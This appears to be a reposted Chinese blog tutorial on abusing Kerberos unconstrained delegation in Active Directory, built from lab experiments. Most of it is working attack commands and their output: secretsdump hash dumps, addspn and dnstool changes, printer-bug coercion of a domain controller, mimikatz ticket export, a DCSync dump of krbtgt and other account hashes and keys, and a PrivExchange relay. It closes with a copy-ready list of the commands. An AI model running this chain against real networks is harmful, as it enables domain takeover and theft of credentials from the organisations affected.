碼上快樂

相關內容    簡體    繁體

在Active Directory中濫用無約束Kerberos委派

本文轉載自   查看原文   2021-03-03 20:16   478 

這篇文章主要是學習在Active Directory中濫用Kerberos委派方式

這里主要是圍繞三種委派類型學習

1.2003之前無約束委派
2.2003之后出現的約束委派
3.2012之后推出的基於資源的約束委派

 首先我們來看無約束委派的濫用

我們如何在內網中查找存在無約束委派的目標吶

PS C:\Users\Administrator\Desktop> Get-DomainComputer -Unconstrained -Properties useraccountcontrol,dnshostname

                                         useraccountcontrol dnshostname
                                         ------------------ -----------
               SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION DC01.isoon.cduestc
          WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION SERVER01.isoon.cduestc

 也可以用ldapserch

ldapsearch -x -H ldap://10.0.0.9:389 -D "CN=itboy,CN=Users,DC=isoon,DC=cduestc" -w 123456aaA -b "DC=isoon,DC=cduestc" "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" |grep -iE "distinguishedName"

 

任何在其UserAccountControl(UAC)屬性中包含TRUSTED_FOR_DELEGATION值的計算機帳戶都是可行的目標。您將始終看到具有此值的域控制器,因為這是默認設置。域控制器還將具有SERVER_TRUST_ACCOUNT UAC值,從而使其易於與非DC區分。域特權升級的實際目標將是具有TRUSTED_FOR_DELEGATION UAC值的非DC機器,例如上例中的SERVER01.isoon.cduestc。

復現

實驗一:控制無約束委派的SPN屬性(這里不使用無約束委派自身機器來,因為如果這樣則需要使用獼猴桃或者Rubeus在機器的lsass中轉儲緩存hash。這樣會在目標機器執行代碼,減少一層與殺軟對抗的經歷,但是這樣做流量就明顯了,雖然減少了與殺軟的對抗但是增加了與IDS的防護過程,所以有利有弊)

 

條件

1,有無約束委派機器的權限(administrator權限導出hash)
2,2012及以上的機器(我測試08沒成功,不代表08沒有)
3,此計算機賬戶具有Validated-MS-DS-Additional-DNS-Host-Name權限 這里我server2012的普通域機器默認無此權限(更改DNS指向新SPN服務機器)(可以不用)

第一步:

我們先通過我們能控制的非約束委派的機器進行hash的導出

root@kali:/home/peloader/krbrelayx# secretsdump.py web@server.7dap.clubImpacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e6e31844f06a381e1bce39329f0aa6d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:940106a807c4ec5bb76719c4b6edf378:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
7DAP\SERVER$:aes256-cts-hmac-sha1-96:5be6911f596e5d55caec8fa895fe761cc0b5e231c8f3adbbf2e82932264740c2
7DAP\SERVER$:aes128-cts-hmac-sha1-96:e1b34812778d5432c33f1be9b81dd4a5
7DAP\SERVER$:des-cbc-md5:ae1552c4df856162
7DAP\SERVER$:plain_password_hex:2b00720069002f00260044007800640061005c005b007400420079007100620040003b0028002500670073007900500022003500330035002b0043007600670041006e003d0053003f004d0024003d0067003c005c006b004e004a00590055003100330073002d006e003b00520021004e0071005f005c00700039005d00420071006a00650025007800250034005d002600480026006e0023003d00470036005400490043003900210057002300430045004b004a003d006300640055006000620055002c0031006e00750061007300770074004f00360049003400480028003b003900730032006f00200040005900
7DAP\SERVER$:aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x855b06cf8d2ff5f6e166de263f0d206a7d7ec2c5
dpapi_userkey:0xfae7e83d3d71c8394351ce98c5870a0cbb21bd5b
[*] NL$KM 
 0000   1F 5B 8D 3F 18 8A B0 83  87 E5 7A 03 A1 28 7D D4   .[.?......z..(}.
 0010   9A 1F 2E 6A AC AE 8E CB  85 D9 AD 0E A9 56 3D 57   ...j.........V=W
 0020   34 BD 02 05 D1 ED 52 0F  23 6D 46 18 72 F5 21 D8   4.....R.#mF.r.!.
 0030   87 C8 7E EF 5E D8 55 E9  05 CC D0 6F 5E 16 9E 3E   ..~.^.U....o^..>
NL$KM:1f5b8d3f188ab08387e57a03a1287dd49a1f2e6aacae8ecb85d9ad0ea9563d5734bd0205d1ed520f236d461872f521d887c87eef5ed855e905ccd06f5e169e3e
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

這里主要是獲取非約束委派機器的機器hash和Kerberos的key

第二步

我們手動添加SPN,這里我們通過https://twitter.com/_dirkjan的工具 用於server通過kerberos驗證后獲取到的在aq_rep過程中獲取到的tgt來訪問atter的smb服務 從而我們通過監聽atter抓到此tgt並且導出

root@kali:/home/peloader/krbrelayx# python3 addspn.py -u 7dap.club\\server\$ -p aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 -s HOST/attacker.7dap.club WIN-1EVBCK47T4G.7dap.club --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

 第三步:

現在SPN已經指向了atter,但是dns並不能解析atter.7dap.club,事實證明,Validated-MS-DS-Additional-DNS-Host-Name實際上不需要經過驗證的寫入權限即可更新該msDS-AdditionalDnsHostName屬性。默認情況下,為計算機對象啟用的“驗證的DNS主機名寫入”功能還允許我們寫入該msDS-AdditionalDnsHostName屬性,並允許我們將當前域內的任何主機名分配給計算機對象,然后SPN將為此計算機對象自動添加。

root@kali:/home/peloader/krbrelayx# python3 dnstool.py -u 7dap\\server\$ -p aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 -r attacker.7dap.club -d 10.1.1.133 --action add WIN-1EVBCK47T4G.7dap.club
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

 第四步

我們以krbrelayx以導出模式啟動,並且使域控通過打印機錯誤對我們進行身份驗證

python3 krbrelayx.py -aesKey 5be6911f596e5d55caec8fa895fe761cc0b5e231c8f3adbbf2e82932264740c2

 可以看見獲取到了

 

 

 

 

 

 這里提供了域控賬戶的krbtg,意味着我們具有了DCsync的權限

root@kali:/home/peloader/krbrelayx# export KRB5CCNAME=WIN-1EVBCK47T4G\$@7DAP.CLUB_krbtgt@7DAP.CLUB.ccache
root@kali:/home/peloader/krbrelayx# secretsdump.py -k WIN-1EVBCK47T4G.7dap.club -just-dcImpacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3ec7d16c3809ca64f2896f2d21564412:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:dc2dc1419e70f95658e847fbd8bb6bdf:::
dc:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
7dap.club\web:1108:aad3b435b51404eeaad3b435b51404ee:8143cc3e933cfa7c1e2fef31cfe21293:::
WIN-1EVBCK47T4G$:1002:aad3b435b51404eeaad3b435b51404ee:04ecb447e1ab0d298cccfc5f344775df:::
SERVER$:1109:aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:cb41215a7df69153f8e2bb519deee60af22b8272069cdc56d73a776a5cb334c4
krbtgt:aes128-cts-hmac-sha1-96:173cd5d54c6bdceff90ba3324f9e827f
krbtgt:des-cbc-md5:f72a2f51b0234cb0
7dap.club\web:aes256-cts-hmac-sha1-96:a102b386c82978dd9d54d839799b63b5ea99ecf408e159c662bb32e7b6abffee
7dap.club\web:aes128-cts-hmac-sha1-96:92b8e0e43b3112ebe80ec70d6528b551
7dap.club\web:des-cbc-md5:6b5e3b45251ca78a
WIN-1EVBCK47T4G$:aes256-cts-hmac-sha1-96:6e604ab1e46dfc1a799ecf5dff2b3aa9d5d567616a29fc0adef2dceb4932f54b
WIN-1EVBCK47T4G$:aes128-cts-hmac-sha1-96:ac467905925d51538871d4928d263f01
WIN-1EVBCK47T4G$:des-cbc-md5:018a135e4361f434
SERVER$:aes256-cts-hmac-sha1-96:5be6911f596e5d55caec8fa895fe761cc0b5e231c8f3adbbf2e82932264740c2
SERVER$:aes128-cts-hmac-sha1-96:e1b34812778d5432c33f1be9b81dd4a5
SERVER$:des-cbc-md5:ae1552c4df856162
[*] Cleaning up...

 實驗二

由於實驗一是通過addns(容易觸發警報)來無需在server上面進行hash的提取的,但是在實戰環境中,你得需要一台在內網可以利用的監聽機器,並且是root權限,相比與直接在非約束委派的機器執行,雖然要bypass AV dump hash,但是還是有很多辦法,這里我們模擬實戰,假設上線的server1就是具有非約束委派的機器,

條件:獲取當前domain內具有非約束機器委派的機器權限

直接使用 這里我用的是域用戶認證 當然也可以使用機器hash如上

root@kali:/home/peloader/krbrelayx# python3 printerbug.py 7dap.club/web@WIN-1EVBCK47T4G.7dap.club server.7dap.club
[*] Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Attempting to trigger authentication via rprn RPC at WIN-1EVBCK47T4G.7dap.club
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

 我們受害機器使用 https://github.com/GhostPack/Rubeus監聽

 

 

 使用https://twitter.com/_dirkjan的工具包觸發打印機錯誤,強制DC對我們進行身份驗證

域用戶認證

root@kali:/home/peloader/krbrelayx# python3 printerbug.py 7dap.club/web@WIN-1EVBCK47T4G.7dap.club server.7dap.club
[*] Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Attempting to trigger authentication via rprn RPC at WIN-1EVBCK47T4G.7dap.club
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

 域機器認證

root@kali:/home/peloader/krbrelayx# python3 printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 7dap.club/server\$@WIN-1EVBCK47T4G.7dap.club server.7dap.club
[*] Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] Attempting to trigger authentication via rprn RPC at WIN-1EVBCK47T4G.7dap.club
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

在我們可控的非約束委派的機器上獲取到DC的krbtgt

 

 我們用獼猴桃導出

sekurlsa::tickets /export‘

 得到DC的krbtgt票據

 

 然后將此票據導入

kerberos::ptt "[0;7a74f5]-2-0-40e10000-DC@krbtgt-7dap.club.kirbi"

 

這里我導入完成后,查看了本機的klist確實存在了此票據,但沒有dcsync權限。klist purge

 

 

 

 很奇怪的需要是我在新的窗口打開新的獼猴桃才能導出(不解,疑惑,歡迎討論)

 

 實驗3:濫用服務帳戶和PrivExchange

前提條件

1用戶賬號密碼(這里我是通過數據庫密碼噴射得到的)

2對服務的委派控制權限

 

假設我們可以控制的web該用戶已委派了在Service AccountsOU中管理用戶的權限我們還發現該服務帳戶mssqler設置了弱密碼123456Xx。此服務帳戶僅在上運行MSSQL服務的SPN:sqlservers.7dap.club,由於我們希望通過Exchange通過PrivExchange升級特權,而PrivExchange通過HTTP連接,因此我們使用此帳戶添加一個新的SPN http/priv.7dap.club

root@kali:/home/peloader/krbrelayx# python3 addspn.py -u 7dap\\web -p 123456aaA1 -t mssqler -s http/priv.7dap.club -q WIN-1EVBCK47T4G.7dap.club
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=mssqler,CN=Users,DC=7dap,DC=club - STATUS: Read - READ TIME: 2021-03-02T21:13:42.376489
    sAMAccountName: mssqler
    servicePrincipalName: MSSQLSvc/sqlservers.7dap.club

 

 

 

root@kali:/home/peloader/krbrelayx# python3 addspn.py -u 7dap\\web -p 123456aaA1 -t mssqler -s http/priv.7dap.club WIN-1EVBCK47T4G.7dap.club
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

 

 這里我們還是把DNS指向我們攻擊ip

root@kali:/home/peloader/krbrelayx# python3 dnstool.py -u 7dap\\web -p 123456aaA1 -r priv.7dap.club -d 10.0.1.133 --action add WIN-1EVBCK47T4G.7dap.club
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

 

 

 由於這里我們使用的是用戶賬戶,因此默認情況下,票證將使用RC4進行加密,因此我們需要計算密碼的NTLM哈希值才能對其進行解密(我們在這里無需費心Kerberos鹽,因為RC4不會不使用)。可以用python也可以去cmd直接加密

import hashlib
print(hashlib.new('md4', '123456Xx'.encode('utf-16le')).hexdigest())

 我們還是先啟動krbrelayx.py

^Croot@kali:/home/peloader/krbrelayx# python3 krbrelayx.py -hashes aad3b435b51404eeaad3b435b51404ee:d5dd1824ba147812b79836b7d7f5fc14 -t ldap://WIN-1EVBCK47T4G.7dap.club --escalate-user web
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in attack mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

 在啟動privexchange.py(這里遇到了一個問題 解決方法一:將http.client改成request 解決方法二就是作者github的issue

root@kali:/home/peloader/PrivExchange# python3 privexchange2.py -u web -p 123456aaA1 -ah priv.7dap.club Exc.7dap.club -d 7dap.club
INFO: Using attacker URL: http://priv.7dap.club/privexchange/
INFO: Exchange returned HTTP status 200 - authentication was OK
INFO: API call was successful

這里你可能會有些疑問 為什么獲取的是EXC的krbtgt但是卻有dcsync權限吶,不懂的小伙伴可以看這里

域滲透——使用Exchange服務器中特定的ACL實現域提權

https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E4%BD%BF%E7%94%A8Exchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD%E7%89%B9%E5%AE%9A%E7%9A%84ACL%E5%AE%9E%E7%8E%B0%E5%9F%9F%E6%8F%90%E6%9D%83/

 

 

 參考

https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
https://github.com/dirkjanm/PrivExchange/issues/13

 此次的命令總結

python3 printerbug.py 7dap.club/webadmin@WIN-1EVBCK47T4G.7dap.club attacker.7dap.club

python3 addspn.py -u 7dap.club\\server\$ -p aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 -s HOST/attacker.7dap.club WIN-1EVBCK47T4G.7dap.club --additional
python3 dnstool.py -u 7dap.club\\server\$ -p aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 -r attacker.7dap.club -d 10.1.1.133 --action add WIN-1EVBCK47T4G.7dap.club
python3 printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 7dap.club/server\$@WIN-1EVBCK47T4G.7dap.club attacker.7dap.club
python3 krbrelayx.py -aesKey 5be6911f596e5d55caec8fa895fe761cc0b5e231c8f3adbbf2e82932264740c2
python3 printerbug.py -hashes aad 3b435b51404eeaad3b435b51404ee:dac034face472c4156e7889fcb8ca34f isoon.cduestc/Server01\$@DC1.isoon.cduestc Server01.isoon.cduestc
ldapsearch -x -H ldap://10.0.0.9:389 -D "CN=itboy,CN=Users,DC=isoon,DC=cduestc" -w 123456aaA -b "DC=isoon,DC=cduestc" "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" |grep -iE "distinguishedName"


python3 addspn.py -u 7dap\\mssqler -p 123456Xx -t MSSQLSvc -s http/priv.7dap.club -q WIN-1EVBCK47T4G.7dap.club

Get-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=7dap,DC=club" -properties sPNMappings
MSSQL/database.internal.corp



python3 krbrelayx.py -hashes aad3b435b51404eeaad3b435b51404ee:d5dd1824ba147812b79836b7d7f5fc14 -t ldap://WIN-1EVBCK47T4G.7dap.club --escalate-user web
python3 addspn.py -u 7dap\\mssqler -p 123456Xx -t MSSQLSvc -s http/priv.7dap.club -q WIN-1EVBCK47T4G.7dap.club

ython addspn.py -u icorp\\helpdesk -p Welkom01 -t sqlserv -s http/evil.internal.corp icorp-dc.internal.corp
python3 addspn.py -u 7dap\\web -p 123456aaA1 -t mssqler -s http/priv.7dap.club WIN-1EVBCK47T4G.7dap.club

python3 dnstool.py -u 7dap\\web -p 123456aaA1 -r priv.7dap.club -d 10.0.1.133 --action add WIN-1EVBCK47T4G.7dap.club

python3 privexchange.py -u web -p 123456aaA1 -ah priv.7dap.club Exchange.7dap.club -d 7dap.club

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Kerberos無約束委派的攻擊和防御 濫用基於資源約束委派來攻擊Active Directory MATLAB進行無約束優化 05-無約束優化算法 無約束最優化方法 無約束最優化的常用方法 Matlab無約束非線性規划的求解 02(e)多元無約束優化問題- 梯度的兩種求解方法以及有約束轉化為無約束問題 無約束優化方法(梯度法-牛頓法-BFGS- L-BFGS) 無約束優化算法——牛頓法與擬牛頓法(DFP,BFGS,LBFGS)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM